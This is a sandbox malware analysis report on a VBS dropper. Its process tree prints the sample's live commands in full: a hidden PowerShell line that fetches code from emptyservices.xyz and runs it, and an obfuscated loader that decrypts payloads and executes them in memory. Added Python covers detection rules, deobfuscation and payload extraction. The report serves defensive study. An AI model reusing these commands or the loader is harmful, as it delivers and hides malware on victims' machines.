Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    13-12-2024 02:57

General

  • Target

    b89759e93738b1b607e48a29f62bfda31e555b0aad30614c261ddf4ba10bdcdf.vbs

  • Size

    67KB

  • MD5

    9ffb1e62265a9b36d8c29afafc14f6fe

  • SHA1

    7e0abfdff1019bf28267f069b6fdf6658eb742b5

  • SHA256

    b89759e93738b1b607e48a29f62bfda31e555b0aad30614c261ddf4ba10bdcdf

  • SHA512

    7458a2fb582a0a314ff9d443515ab4379e9a71e26ccf0788e971898b32be58b64f82771dfc901eafe9e28db0755146432f02be5892fb64188c129e72f3d402f0

  • SSDEEP

    1536:VpR0fCWy9wwuo9MIA9Y31BYfHAoH7XpUoQ0tThvi:j8vwwI9Mz9Y3GZ19Q6hvi

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with a hidden display window (-WindowStyle Hidden).

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
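The signatures above are the sandbox's generic labels. As an added example (not part of the report), the Python below turns each hop of this particular chain into a rule and runs it over constructed Sysmon-style events (Event ID 1 process creation, Event ID 13 registry value set) modelled on the process tree listed under Processes below. The events themselves, the Run-key value name (the report does not give one) and the shortened obfuscated command line are constructed; the domain emptyservices.xyz and the command-line shapes are taken from the report.

```python
import json
import re

# Detection rules for the chain in the process tree, run over constructed
# Sysmon-style events. Nothing here is copied from a real sensor.
IOC_DOMAINS = ("emptyservices.xyz",)            # from the powershell.exe command line in the report
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD_EXEC = re.compile(r"\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I)
TEMP_BAT = re.compile(r'\\AppData\\Local\\Temp\\[^"]+\.bat', re.I)
REFLECTIVE = re.compile(r"\[System\.Reflection\.Assembly\]::", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: dict) -> list:
    """Return the rule names that fire for one event."""
    hits = []
    if ev["EventID"] == 1:
        parent, image, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
        if parent in SCRIPT_HOSTS and image == "powershell.exe" and HIDDEN.search(cmd) and DOWNLOAD_EXEC.search(cmd):
            hits.append("T1059.001 script host spawned hidden PowerShell download-and-execute")
        if parent in SCRIPT_HOSTS and image == "cmd.exe" and TEMP_BAT.search(cmd):
            hits.append("T1059.003 script host launched a batch file dropped in %TEMP%")
        if cmd.count(".Replace('") >= 5:
            hits.append("T1027 string-splitting obfuscation (repeated .Replace of junk tokens)")
        if REFLECTIVE.search(cmd):
            hits.append("T1620 reflective assembly load from the command line")
        for dom in IOC_DOMAINS:
            if dom in cmd.lower():
                hits.append(f"IOC contact with {dom}")
    elif ev["EventID"] == 13:
        if basename(ev["Image"]) in SCRIPT_HOSTS and RUN_KEY.search(ev["TargetObject"]):
            hits.append("T1547.001 script host wrote a Run key")
    return hits


def scan(raw_events) -> dict:
    """Group rule hits by ProcessId, taking one JSON event per line."""
    findings = {}
    for line in raw_events:
        ev = json.loads(line)
        hits = evaluate(ev)
        if hits:
            findings.setdefault(ev["ProcessId"], []).extend(hits)
    return findings


# Constructed events (JSON lines). The Run-key value name is a placeholder and the
# PID 2240 command line keeps only five of the fourteen .Replace tokens.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 1, "ProcessId": 1700, "ParentImage": "C:\\Windows\\explorer.exe",
                "Image": "C:\\Windows\\System32\\WScript.exe",
                "CommandLine": '"C:\\Windows\\System32\\WScript.exe" "C:\\Users\\Admin\\AppData\\Local\\Temp\\sample.vbs"'}),
    json.dumps({"EventID": 13, "ProcessId": 1700, "Image": "C:\\Windows\\System32\\WScript.exe",
                "TargetObject": "HKU\\S-1-5-21-0\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\placeholder"}),
    json.dumps({"EventID": 1, "ProcessId": 2788, "ParentImage": "C:\\Windows\\System32\\WScript.exe",
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -WindowStyle Hidden '
                               '-Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing '
                               "-Headers @{ 'Authorization' = 'your_fixed_token_here' })\""}),
    json.dumps({"EventID": 1, "ProcessId": 1492, "ParentImage": "C:\\Windows\\System32\\WScript.exe",
                "Image": "C:\\Windows\\System32\\cmd.exe",
                "CommandLine": 'cmd /c ""C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat" "'}),
    json.dumps({"EventID": 1, "ProcessId": 2240, "ParentImage": "C:\\Windows\\system32\\cmd.exe",
                "Image": "C:\\Windows\\system32\\cmd.exe",
                "CommandLine": "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo $host.UI.RawUI.WindowTitle="
                               "'C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat';"
                               "$tSzt='CoyggSpyyggSTyggSoyggS'.Replace('yggS', ''),"
                               "'LoaWwjgdWwjg'.Replace('Wwjg', ''),'InhKbUvhKbUokehKbU'.Replace('hKbU', ''),"
                               "'EnthHmDryPhHmDoihHmDnthHmD'.Replace('hHmD', ''),"
                               "'FrrEElorEElmBarEElserEEl64rEElStrEElrrEElinrEElgrEEl'.Replace('rEEl', '');"
                               "[System.Reflection.Assembly]::($tSzt[3])([byte[]]$vtSyn).($tSzt[9]).($tSzt[6])($null,$null); \""}),
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, *hits, sep="\n  ")
```

The parent/child pairing matters more than any single string: hidden PowerShell alone is common in administrative scripts, but a script host (WScript.exe) as parent of hidden PowerShell that pipes a web download into iex, or of cmd.exe running a .bat out of %TEMP%, is rarely legitimate. The T1027 rule is intentionally crude (a count of `.Replace('`); it is cheap and hard to evade without changing the obfuscator.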

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b89759e93738b1b607e48a29f62bfda31e555b0aad30614c261ddf4ba10bdcdf.vbs"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2788
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1492
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\system.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2360
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\system.bat';$tSzt='CoyggSpyyggSTyggSoyggS'.Replace('yggS', ''),'TreKpmaneKpmsfeKpmormeKpmFeKpmineKpmaeKpmlBeKpmloceKpmkeKpm'.Replace('eKpm', ''),'ErHgtlemrHgtentrHgtAtrHgt'.Replace('rHgt', ''),'LoaWwjgdWwjg'.Replace('Wwjg', ''),'DecGFmyompGFmyrGFmyessGFmy'.Replace('GFmy', ''),'CrFbwFeFbwFateFbwFDecFbwFrFbwFyptFbwForFbwF'.Replace('FbwF', ''),'InhKbUvhKbUokehKbU'.Replace('hKbU', ''),'MaBxbRinBxbRMBxbRodBxbRulBxbReBxbR'.Replace('BxbR', ''),'SpYdNplpYdNipYdNtpYdN'.Replace('pYdN', ''),'EnthHmDryPhHmDoihHmDnthHmD'.Replace('hHmD', ''),'ReNXtTadLNXtTinNXtTesNXtT'.Replace('NXtT', ''),'GePRsKtCPRsKurPRsKrPRsKePRsKntPRsKPrPRsKoPRsKcPRsKesPRsKsPRsK'.Replace('PRsK', ''),'ChpQqmangpQqmeEpQqmxtepQqmnpQqmsipQqmonpQqm'.Replace('pQqm', ''),'FrrEElorEElmBarEElserEEl64rEElStrEElrrEElinrEElgrEEl'.Replace('rEEl', '');powershell -w hidden;function aRtvG($VLEjt){$KNVsD=[System.Security.Cryptography.Aes]::Create();$KNVsD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KNVsD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KNVsD.Key=[System.Convert]::($tSzt[13])('ZsQNWZMNttfFdanp5YMfjA81pjXlEiaRBDoUMbmKu7A=');$KNVsD.IV=[System.Convert]::($tSzt[13])('Zwl9jKpodheYgolhwF+ZoA==');$NvSea=$KNVsD.($tSzt[5])();$ocMex=$NvSea.($tSzt[1])($VLEjt,0,$VLEjt.Length);$NvSea.Dispose();$KNVsD.Dispose();$ocMex;}function DyGwn($VLEjt){$TnJXr=New-Object System.IO.MemoryStream(,$VLEjt);$ALCZl=New-Object System.IO.MemoryStream;$vftmX=New-Object System.IO.Compression.GZipStream($TnJXr,[IO.Compression.CompressionMode]::($tSzt[4]));$vftmX.($tSzt[0])($ALCZl);$vftmX.Dispose();$TnJXr.Dispose();$ALCZl.Dispose();$ALCZl.ToArray();}$bjAKz=[System.IO.File]::($tSzt[10])([Console]::Title);$AliFC=DyGwn (aRtvG ([Convert]::($tSzt[13])([System.Linq.Enumerable]::($tSzt[2])($bjAKz, 5).Substring(2))));$vtSyn=DyGwn (aRtvG ([Convert]::($tSzt[13])([System.Linq.Enumerable]::($tSzt[2])($bjAKz, 6).Substring(2))));[System.Reflection.Assembly]::($tSzt[3])([byte[]]$vtSyn).($tSzt[9]).($tSzt[6])($null,$null);[System.Reflection.Assembly]::($tSzt[3])([byte[]]$AliFC).($tSzt[9]).($tSzt[6])($null,$null); "
          4⤵
            PID:2240
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1724
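The cmd.exe command line for PID 2240 hides every .NET method name behind `$tSzt`, an array built by splicing a random four-character junk token into each name and calling `.Replace(junk, '')` at run time; the body then reaches each method indirectly as `.($tSzt[N])`. Because every token is a literal, the table can be rebuilt statically. The Python below is an added example (not part of the report or of the sample): it parses the `$tSzt` assignment copied verbatim from the command line above, resolves all fourteen names, and substitutes them into a verbatim excerpt of the loader body so the call chain reads plainly.

```python
import re

# The $tSzt assignment from the PID 2240 command line, copied verbatim.
TSZT_ASSIGNMENT = (
    "'CoyggSpyyggSTyggSoyggS'.Replace('yggS', ''),"
    "'TreKpmaneKpmsfeKpmormeKpmFeKpmineKpmaeKpmlBeKpmloceKpmkeKpm'.Replace('eKpm', ''),"
    "'ErHgtlemrHgtentrHgtAtrHgt'.Replace('rHgt', ''),"
    "'LoaWwjgdWwjg'.Replace('Wwjg', ''),"
    "'DecGFmyompGFmyrGFmyessGFmy'.Replace('GFmy', ''),"
    "'CrFbwFeFbwFateFbwFDecFbwFrFbwFyptFbwForFbwF'.Replace('FbwF', ''),"
    "'InhKbUvhKbUokehKbU'.Replace('hKbU', ''),"
    "'MaBxbRinBxbRMBxbRodBxbRulBxbReBxbR'.Replace('BxbR', ''),"
    "'SpYdNplpYdNipYdNtpYdN'.Replace('pYdN', ''),"
    "'EnthHmDryPhHmDoihHmDnthHmD'.Replace('hHmD', ''),"
    "'ReNXtTadLNXtTinNXtTesNXtT'.Replace('NXtT', ''),"
    "'GePRsKtCPRsKurPRsKrPRsKePRsKntPRsKPrPRsKoPRsKcPRsKesPRsKsPRsK'.Replace('PRsK', ''),"
    "'ChpQqmangpQqmeEpQqmxtepQqmnpQqmsipQqmonpQqm'.Replace('pQqm', ''),"
    "'FrrEElorEElmBarEElserEEl64rEElStrEElrrEElinrEElgrEEl'.Replace('rEEl', '')"
)

# Representative statements of the loader body (verbatim from the command line)
# in which the method names are reached indirectly as .($tSzt[N]).
LOADER_EXCERPT = (
    "$KNVsD.Key=[System.Convert]::($tSzt[13])('ZsQNWZMNttfFdanp5YMfjA81pjXlEiaRBDoUMbmKu7A=');"
    "$NvSea=$KNVsD.($tSzt[5])();$ocMex=$NvSea.($tSzt[1])($VLEjt,0,$VLEjt.Length);"
    "$vftmX=New-Object System.IO.Compression.GZipStream($TnJXr,[IO.Compression.CompressionMode]::($tSzt[4]));"
    "$vftmX.($tSzt[0])($ALCZl);"
    "$bjAKz=[System.IO.File]::($tSzt[10])([Console]::Title);"
    "$AliFC=DyGwn (aRtvG ([Convert]::($tSzt[13])([System.Linq.Enumerable]::($tSzt[2])($bjAKz, 5).Substring(2))));"
    "[System.Reflection.Assembly]::($tSzt[3])([byte[]]$vtSyn).($tSzt[9]).($tSzt[6])($null,$null);"
)

# One obfuscated element: '<text>'.Replace('<junk>', '')
TOKEN_RE = re.compile(r"'([^']*)'\.Replace\('([^']*)',\s*''\)")
# One indirect member access: ($tSzt[N])
INDEX_RE = re.compile(r"\(\$tSzt\[(\d+)\]\)")


def resolve_table(assignment: str) -> list:
    """Rebuild $tSzt by applying each .Replace(junk, '') statically, in order."""
    return [text.replace(junk, "") for text, junk in TOKEN_RE.findall(assignment)]


def deobfuscate(script: str, table: list) -> str:
    """Replace every ($tSzt[N]) indirection with the resolved method name."""
    return INDEX_RE.sub(lambda m: table[int(m.group(1))], script)


if __name__ == "__main__":
    table = resolve_table(TSZT_ASSIGNMENT)
    for i, name in enumerate(table):
        print(f"$tSzt[{i:2}] = {name}")
    print(deobfuscate(LOADER_EXCERPT, table).replace(";", ";\n"))
```

Resolved, the table is CopyTo, TransformFinalBlock, ElementAt, Load, Decompress, CreateDecryptor, Invoke, MainModule, Split, EntryPoint, ReadLines, GetCurrentProcess, ChangeExtension, FromBase64String, and the last statement of the excerpt becomes `[System.Reflection.Assembly]::Load([byte[]]$vtSyn).EntryPoint.Invoke($null,$null)`: an in-memory .NET assembly load with no file written. Note that `MainModule`, `Split`, `GetCurrentProcess` and `ChangeExtension` are resolved but never referenced in the visible body, which suggests the table is shared with other variants of the same loader template. This static approach only works because every argument is a literal; an obfuscator that computed the junk token at run time would need emulation instead.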

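Once the names are resolved, the loader's data flow is short: the batch file sets the console title to its own path, PowerShell reads that file with File.ReadLines, takes lines 5 and 6 (0-based, Enumerable.ElementAt), drops their first two characters with Substring(2), base64-decodes them, decrypts with AES-CBC/PKCS7 under the key and IV hard-coded in the command line (32-byte key, so AES-256), GZip-decompresses the result, and hands the bytes to Assembly.Load followed by EntryPoint.Invoke. The Python below is an added example (not the sample's code, and not the page's): it reproduces that pipeline offline up to the decompressed assembly bytes, so the embedded stages can be extracted from system.bat without executing anything. The real system.bat is not reproduced on this page, so `build_fixture()` constructs a stand-in using the forward transform; the `::` line prefix it uses is an assumption (the report only shows that two characters are skipped). The block depends on the third-party `cryptography` package.

```python
import base64
import gzip

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Key (32 bytes, AES-256) and IV (16 bytes) exactly as embedded in the PID 2240 command line.
KEY = base64.b64decode("ZsQNWZMNttfFdanp5YMfjA81pjXlEiaRBDoUMbmKu7A=")
IV = base64.b64decode("Zwl9jKpodheYgolhwF+ZoA==")
PAYLOAD_LINES = (5, 6)   # ElementAt($bjAKz, 5) -> $AliFC, ElementAt($bjAKz, 6) -> $vtSyn
PREFIX_LEN = 2           # .Substring(2); the skipped prefix itself is not shown in the report


def aes_cbc_decrypt(blob: bytes) -> bytes:
    """Equivalent of aRtvG(): AES-CBC with PKCS7 padding under the fixed key and IV."""
    dec = Cipher(algorithms.AES(KEY), modes.CBC(IV)).decryptor()
    padded = dec.update(blob) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(padded) + unpad.finalize()


def extract_payloads(bat_text: str) -> list:
    """Return the embedded assemblies in the order the loader invokes them:
    $vtSyn (line 6) runs before $AliFC (line 5)."""
    lines = bat_text.splitlines()
    assemblies = []
    for idx in reversed(PAYLOAD_LINES):
        blob = base64.b64decode(lines[idx][PREFIX_LEN:])
        assemblies.append(gzip.decompress(aes_cbc_decrypt(blob)))   # equivalent of DyGwn()
    return assemblies


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check before handing the bytes to a .NET decompiler."""
    return data[:2] == b"MZ"


def build_fixture(payloads: dict, total_lines: int = 8) -> str:
    """Constructed stand-in for system.bat: the forward transform (gzip, PKCS7,
    AES-CBC, base64) of the given fake payloads on the given line indices.
    The '::' two-character prefix is an assumption."""
    lines = [f"rem filler line {i}" for i in range(total_lines)]
    for idx, plain in payloads.items():
        pad = padding.PKCS7(128).padder()
        padded = pad.update(gzip.compress(plain)) + pad.finalize()
        enc = Cipher(algorithms.AES(KEY), modes.CBC(IV)).encryptor()
        lines[idx] = "::" + base64.b64encode(enc.update(padded) + enc.finalize()).decode()
    return "\r\n".join(lines)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:          # real use: pass the dropped system.bat
        text = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    else:                          # demo on constructed data (fake payloads, not real stages)
        text = build_fixture({5: b"MZ" + b"\x90" * 64 + b"stage-A",
                              6: b"MZ" + b"\x90" * 64 + b"stage-B"})
    for n, asm in enumerate(extract_payloads(text), 1):
        print(f"payload {n}: {len(asm)} bytes, {'PE' if looks_like_pe(asm) else 'not PE'}")
```

Write each returned byte string to disk and open it in a .NET decompiler; the loader never drops these assemblies, so this is the only way to get them without letting EntryPoint.Invoke run. If decryption raises a padding error, the first thing to check is the two-character prefix assumption and the line indices, which an updated build of the loader can change without touching the key.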
    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\system.bat

      Filesize

      66KB

      MD5

      5f705dae5b64c2091db9b36fed377e74

      SHA1

      10209ca44ec5fc7289371296f0113e5001a7a3d2

      SHA256

      de81ae7b4398a1ec4091ad8e9ed9cf4fdc1ed88b7b1af8a5d07aacba1b0f4af7

      SHA512

      23b077a0fd01fa85a9f81b2f14db30a99a44bc3a1c45131f235fdf0c87542d33b4ea042db620fa50c924e214ce1e428eb05d0f651f7119979e07767df3b17878

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      63e4c2562fc4e01e628a5578b249afdc

      SHA1

      58ae9aeb4cdfc8ffec74291d61bc2b0aa655d607

      SHA256

      08d8a59aa874bc80712526f68b0340ec3ab130555ea3b76397d5660a9459a354

      SHA512

      e223c6ae4184d740e6c64409215ec4ca34f883cc34c3cd9aeb3758e3d8e006c666f1dbd0c1994a96d5148f3349c99746da7f719eb5dd52ea7d2ff9106b1e6c75

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TESEM5ITJJHV5OWVPZYY.temp

      Filesize

      7KB

      MD5

      015c54c8503c5b635dbccc01a65d7716

      SHA1

      a4c7f6db2504280b1eee037595f13c7bbba18d75

      SHA256

      1f54c5f6c595991680499fc6cdb5d55863f497b3f6a073ea0c3aef962123548b

      SHA512

      15718543ddf05775366422d0ec74e20c0c7477b796ff0257073b4804e1b20d1ca9fc84004dca3e695cf622bab9c3eb5d7f50f1ae74201f2ab07ab454574828e1

    • memory/1724-27-0x0000000001D70000-0x0000000001D78000-memory.dmp

      Filesize

      32KB

    • memory/1724-26-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

      Filesize

      2.9MB

    • memory/2788-7-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

    • memory/2788-10-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

    • memory/2788-11-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

    • memory/2788-9-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

    • memory/2788-8-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

    • memory/2788-4-0x000007FEF58AE000-0x000007FEF58AF000-memory.dmp

      Filesize

      4KB

    • memory/2788-6-0x00000000027A0000-0x00000000027A8000-memory.dmp

      Filesize

      32KB

    • memory/2788-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

      Filesize

      2.9MB